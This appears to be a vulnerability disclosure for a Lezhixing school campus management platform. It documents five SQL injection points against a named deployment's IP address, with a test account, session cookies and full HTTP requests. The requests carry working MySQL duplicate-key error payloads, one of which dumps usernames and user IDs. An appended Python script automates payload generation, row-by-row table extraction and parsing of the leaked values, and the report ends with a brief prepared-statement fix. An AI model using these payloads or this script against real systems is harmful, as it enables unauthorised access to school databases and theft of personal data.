Beijing Lezhixing Software Co., Ltd., general campus management platform. Official customer case list: http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml

Beijing 101 Middle School is used as the example below.
Case URL: http://202.108.154.209/datacenter/#
Test user: test123/123456

First SQL injection:
1. Log in as an ordinary student user.
2. Weekly calendar -> export calendar -> OK.
3. Send the following request:
URL: http://202.108.154.209/oa/calendar/exportExcel.do
POST:exportStartDate=2014-03-03&exportEndDate=2014-03-04&exportCalendars=zhaojinfeng2%E6%97%A5%E5%8E%86&exportCalendarIds=16d07c5ff5e44036b5a44751ab2df91e') AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((user()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and ('1'='1
The injectable parameter is exportCalendarIds (the payload in the request above closes the quoted value, runs the duplicate-key subquery and rebalances the quotes with AND ('1'='1). After the request is sent, an Excel file is downloaded and the injected result (here the output of user()) is written into that file. Open the downloaded file to read the result of the injection.

Second SQL injection:
1. Log in as an ordinary student user.
2. Pick a calendar for one week and edit it (no new calendar needs to be created) -> save the change.
3. Capture the save request and modify the c0-e1 parameter. Send the modified request as follows:
POST /oa/dwr/call/plaincall/calendarRemoteCallController.saveEvent.dwr HTTP/1.1
Host: 202.108.154.209
Cookie: AQ_AUTHENTICATION_COOKIE_KEY=aae03b698ecd444aa0ae02f8d87c026a

callCount=1
windowName=pageContent
c0-scriptName=calendarRemoteCallController
c0-methodName=saveEvent
c0-id=0
c0-e1=string:0e362687769f426380ab1b8a015ef014' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a
c0-e2=string:
c0-e3=string:1111111111111
c0-e4=string:2014-03-04
c0-e5=string:2014-03-04
c0-e6=boolean:true
c0-e7=boolean:true
c0-e8=string:rgb(230%2C115%2C153)
c0-e9=number:1
c0-e10=null:null
c0-e11=string:-1
c0-e12=number:2
c0-e13=string:arrange
c0-e14=number:0
c0-e15=null:null
c0-e16=null:null
c0-e17=string:
c0-e18=string:
c0-e19=string:
c0-e20=string:
c0-e21=string:0
c0-param0=Object_Object:{id:reference:c0-e1, eventId:reference:c0-e2, title:reference:c0-e3, start:reference:c0-e4, end:reference:c0-e5, allDay:reference:c0-e6, editable:reference:c0-e7, backgroundColor:reference:c0-e8, priority:reference:c0-e9, calendarNameId:reference:c0-e10, remind:reference:c0-e11, privacy:reference:c0-e12, eventType:reference:c0-e13, eventStatus:reference:c0-e14, calendarProjectId:reference:c0-e15, arrangeRelation:reference:c0-e16, messageTaskId:reference:c0-e17, dutier:reference:c0-e18, parter:reference:c0-e19, site:reference:c0-e20, xlts:reference:c0-e21}
c0-param1=string:
c0-param2=boolean:false
c0-param3=boolean:true
batchId=25
page=%2Foa%2F%2Fcalendar%2FinitCalendar.do%3F__time__%3D1394571647842
httpSessionId=
scriptSessionId=4C1126686168926E787E3EBB1EA961EF
The server returns an error, and the requested data (user()) appears in the error message: the injection succeeded.

Third SQL injection:
1. Log in as an ordinary student user.
2. On "my desktop" add "my vote" and search for a topic.
3. Capture the search request and modify the criteria parameter. Note that criteria is a raw SQL WHERE fragment built on the client (theme like '%123%'), so no quote needs to be broken out of; the subquery is simply appended with AND. Send the following request:
POST /datacenter/vote/myVoteList.do HTTP/1.1
Host: 202.108.154.209
Cookie: aae03b698ecd444aa0ae02f8d87c026a

_search=false&nd=1394576122963&rows=50&page=1&sidx=from_date&sord=desc&criteria=theme+like+'%25123%25'+AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a'
The requested data comes back in the error: the injection succeeded.

Fourth SQL injection:
1. Log in as an ordinary student user.
2. My portal -> add portal items -> Common Information.
3. Publish a common information item.
4. While publishing, capture the request and modify the id parameter. Send the following request:
URL: http://202.108.154.209/oa//mail/personal/save.do
Cookie: AQ_AUTHENTICATION_COOKIE_KEY=aae03b698ecd444aa0ae02f8d87c026a

POST body:
privat=2&portlet=portlet&xxzt=complete&id=822b6cdadc7140fe91da513963d4efdc' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and 'a'='a&xxbt=222222&fbsf=个人:zhaojinfeng2&fjrsf=&info=<p>222222<br/></p>&editorValue=<p>222222<br/></p>
user() is extracted successfully.

Fifth SQL injection:
1. Log in as an ordinary student user.
2. Go to my desktop, add the desktop, and open campus office.
3. Go to the mail center.
4. Write a letter and preview it. The preview triggers a POST to
http://202.108.154.209/oa/dwr/call/plaincall/MailController.getNotReadtotalNumByClassify.dwr
whose c0-param0 parameter is injectable. Setting c0-param0 to
c0-param0=string:2' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,user_id) from aq_user limit 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a
extracts a username and user_id from the aq_user table. Send the following request:
URL: http://202.108.154.209/oa/dwr/call/plaincall/MailController.getNotReadtotalNumByClassify.dwr
POST body:
callCount=1
windowName=
c0-scriptName=MailController
c0-methodName=getNotReadtotalNumByClassify
c0-id=0
c0-param0=string:2' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,user_id) from aq_user limit 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a
batchId=112
page=%2Fdatacenter%2Fportlet%2FshowPortletList.do%3FmenuId%3Ded57d3b21fff48738552a4601ed30e55
httpSessionId=
scriptSessionId=3756A70426EB76F99A0BBDDF3AC4FEBC
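All five injections use the same MySQL duplicate-key (double-query) trick and three of them go through DWR plaincall endpoints. The script below is an added example, not part of the original report or of the Lezhixing product: it builds the DWR batch body in the format shown in the requests above, generates the double-query payload for an arbitrary inner SELECT (and walks a table row by row with LIMIT offset,1, generalising the aq_user read in the fifth injection), and pulls the leaked value out of the MySQL "Duplicate entry" error. The DWR response text is constructed for the example; only the endpoint, script and method names come from the report.

```python
import re
from urllib.parse import quote, unquote

# Endpoint, script and method names from the fifth injection in the report.
DWR_PATH = "/oa/dwr/call/plaincall/MailController.getNotReadtotalNumByClassify.dwr"


def double_query_payload(inner_select: str, marker: str = "0x23") -> str:
    """Suffix appended to a single-quoted string parameter.

    Closes the quote, runs the duplicate-key subquery used throughout the
    report and rebalances the quotes with AND 'a'='a.  FLOOR(RAND(0)*2)
    yields the fixed sequence 0,1,1,0,1,1,... so GROUP BY on the CONCAT
    value always collides on the second '1' and MySQL reports the colliding
    key (marker + result + marker + '1') in the error text.
    """
    return (
        f"' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT({marker},({inner_select}),"
        f"{marker},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
        f"GROUP BY x)a) AND 'a'='a"
    )


def row_payloads(base_value: str, select_expr: str, table: str, rows: int):
    """Payloads that read a table one row at a time with LIMIT offset,1,
    the way the report reads aq_user with 'limit 0,1'."""
    for offset in range(rows):
        yield base_value + double_query_payload(
            f"SELECT {select_expr} FROM {table} LIMIT {offset},1"
        )


def build_dwr_body(script: str, method: str, params, page: str,
                   batch_id: int = 1, script_session_id: str = "") -> str:
    """Serialise one DWR plaincall batch: one key=value per line, string
    parameters prefixed with 'string:' and percent-encoded (the server
    decodes them, so raw characters as in the report also work)."""
    lines = [
        "callCount=1",
        "windowName=",
        f"c0-scriptName={script}",
        f"c0-methodName={method}",
        "c0-id=0",
    ]
    for i, p in enumerate(params):
        lines.append(f"c0-param{i}=string:{quote(p, safe='')}")
    lines += [
        f"batchId={batch_id}",
        f"page={quote(page, safe='')}",
        "httpSessionId=",
        f"scriptSessionId={script_session_id}",
    ]
    return "\n".join(lines) + "\n"


def dwr_params(body: str) -> dict:
    """Inverse of build_dwr_body for the c0-paramN string entries (decoded)."""
    out = {}
    for line in body.splitlines():
        key, _, value = line.partition("=")
        if key.startswith("c0-param") and value.startswith("string:"):
            out[key] = unquote(value[len("string:"):])
    return out


# MySQL reports the colliding GROUP BY key as "Duplicate entry '...' for key
# 'group_key'".  The leaked value sits between the two '#' markers (0x23);
# the trailing digit is the FLOOR(RAND(0)*2) output.
LEAK_RE = re.compile(r"Duplicate entry '#(.*?)#[01]' for key")


def extract_leak(response_text: str):
    """Return the value between the markers, or None when the response does
    not carry the duplicate-key error (parameter not injectable, or the
    exception swallowed server-side)."""
    m = LEAK_RE.search(response_text)
    return m.group(1) if m else None


# Constructed sample responses (not captured from the target); the DWR
# wrapper is approximate, only the MySQL message matters to extract_leak.
SAMPLE_ERROR_RESPONSE = (
    "//#DWR-REPLY\n"
    "dwr.engine._remoteHandleException({message:\"java.sql.SQLException: "
    "Duplicate entry '#root@localhost#1' for key 'group_key'\"});\n"
)
SAMPLE_OK_RESPONSE = "//#DWR-REPLY\ndwr.engine._remoteHandleCallback('1','0',0);\n"

if __name__ == "__main__":
    body = build_dwr_body(
        "MailController", "getNotReadtotalNumByClassify",
        ["2" + double_query_payload("SELECT user()")],
        "/datacenter/portlet/showPortletList.do", batch_id=112,
    )
    print(body)
    print("leaked:", extract_leak(SAMPLE_ERROR_RESPONSE))
    for p in row_payloads("2", "concat(username,0x23,user_id)", "aq_user", 3):
        print(p)
```

MySQL truncates the value it echoes in the duplicate-entry message (64 characters in common versions), so long results have to be read in SUBSTRING windows inside the inner SELECT; and because the inner SELECT must return exactly one row, a COUNT(*) or LIMIT offset,1 is needed for multi-row tables, as the report does with aq_user.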
Solution: filter the injected parameters (exportCalendarIds, c0-e1, criteria, id, c0-param0); better, pass them to the database as bound parameters of a prepared statement instead of concatenating them into the SQL, and never accept a raw WHERE fragment such as criteria from the client.